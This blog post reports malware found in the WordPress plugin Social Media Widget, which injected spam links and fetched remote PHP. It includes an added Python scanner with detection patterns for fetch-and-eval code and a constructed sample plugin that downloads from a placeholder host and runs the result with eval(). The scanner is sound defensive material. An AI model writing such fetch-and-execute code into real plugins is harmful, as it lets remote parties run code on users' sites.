Today I learned that one of my favorite plugins, Social Media Widget, is infected with malware. When this happens, a plugin will inject advertising spam into a website.
If someone clicks on your Facebook icon, for instance, they will open a page for Pay Day Loan.
According to a post on h-online.com/, researchers at Sucuri believe the malicious code was added at the end of March, when the developers released version 4.0 to the WordPress.org plugin repository.
“The plugin, which changed maintainers in January, had already been noticed behaving oddly a month ago, but the malware in version 4.0 was more obvious, reading and executing a PHP script from a third-party site; the spam injection code was even tidied up to make it more compact. A 4.0.1 version of the plugin then appeared without the malware code, but the WordPress.org maintainers were having none of it – they said that they had removed the widget from the repository and pushed an update to users of the widget to remove it from their systems.”
As a long-time user of Social Media Widget, I immediately dove into my wine site, Tasting Room Confidential, to see if that was one of the plugins I updated the other day. Indeed it was, so I quickly deactivated and deleted it.
I thought I was cool on my other sites, including this one, that still have v. 3.3 installed, but no. According to the comments of the Sucuri blog, previous versions are infected as well, so I deleted, deleted, and deleted again. Goodbye Social Media Widget.
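The behaviour quoted above, a plugin fetching a PHP script from a third-party site and executing it, leaves a recognisable footprint in the plugin's own source: a remote-fetch call and an execute-a-string sink in the same file. The following heuristic scanner is an added example, not code from the original post or from the Social Media Widget project; it walks a WordPress plugins directory and flags PHP files that combine the two. The two plugin files it scans are constructed for illustration (the "tampered" one uses the reserved placeholder host `example.invalid`), so nothing here reproduces the real plugin's code.

```python
"""Heuristic scan of WordPress plugin PHP files for the remote-fetch-and-execute
pattern. Added example; the sample plugins below are constructed, not real."""
import re
import tempfile
from pathlib import Path

# Functions that pull content from a URL (common in legitimate plugins on their own).
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|curl_exec|fopen|wp_remote_get|wp_remote_retrieve_body)\s*\(",
    re.IGNORECASE,
)
# Functions that execute a string as PHP code.
CODE_EXEC = re.compile(r"\b(eval|assert|create_function)\s*\(", re.IGNORECASE)
# Decoders often wrapped around such payloads to hide them from a casual read.
OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.IGNORECASE)
URL_LITERAL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def scan_php_source(source: str) -> dict:
    """Return the indicators found in one PHP source string."""
    findings = {
        "remote_fetch": sorted({m.group(1).lower() for m in REMOTE_FETCH.finditer(source)}),
        "code_exec": sorted({m.group(1).lower() for m in CODE_EXEC.finditer(source)}),
        "obfuscation": sorted({m.group(1).lower() for m in OBFUSCATION.finditer(source)}),
        "urls": sorted(set(URL_LITERAL.findall(source))),
    }
    # A fetch *and* an execute sink in the same file is the pattern described in
    # the quote; either one alone is ordinary and would only produce noise.
    findings["suspicious"] = bool(findings["remote_fetch"] and findings["code_exec"])
    return findings


def scan_plugins_root(plugins_root: Path) -> dict:
    """Scan every .php file below wp-content/plugins; map relative path -> findings."""
    return {
        p.relative_to(plugins_root).as_posix(): scan_php_source(p.read_text(errors="replace"))
        for p in sorted(plugins_root.rglob("*.php"))
    }


# Constructed sample plugins (not the real Social Media Widget source).
CLEAN_PLUGIN = """<?php
/* Plugin Name: Constructed Clean Widget */
function ccw_render() {
    echo '<a href="https://www.facebook.com/">Facebook</a>';
}
"""

TAMPERED_PLUGIN = """<?php
/* Plugin Name: Constructed Tampered Widget */
function ctw_render() {
    // example.invalid is a reserved placeholder host, used here for illustration only.
    $remote = file_get_contents('http://example.invalid/ads.txt');
    eval($remote);
}
"""


def demo() -> dict:
    """Write the two constructed plugins into a temporary plugins root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "clean-widget").mkdir()
        (root / "clean-widget" / "clean-widget.php").write_text(CLEAN_PLUGIN)
        (root / "tampered-widget").mkdir()
        (root / "tampered-widget" / "tampered-widget.php").write_text(TAMPERED_PLUGIN)
        return scan_plugins_root(root)


if __name__ == "__main__":
    for path, result in demo().items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {path}  fetch={result['remote_fetch']} exec={result['code_exec']} urls={result['urls']}")
```

Point `scan_plugins_root` at a real `wp-content/plugins` directory to review the plugins you still have installed before deciding what to keep; a hit is a reason to read the file, not proof of infection, since the combination also occurs in a few legitimate update and templating routines.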
It’s too bad because this is a cute little plugin with an easy interface and lots of options. I have recommended it to all of my WordPress students and must now advise them to delete Social Media Widget v.4.0 from their sites – now!
I imagine 900,000 users are doing the same right now.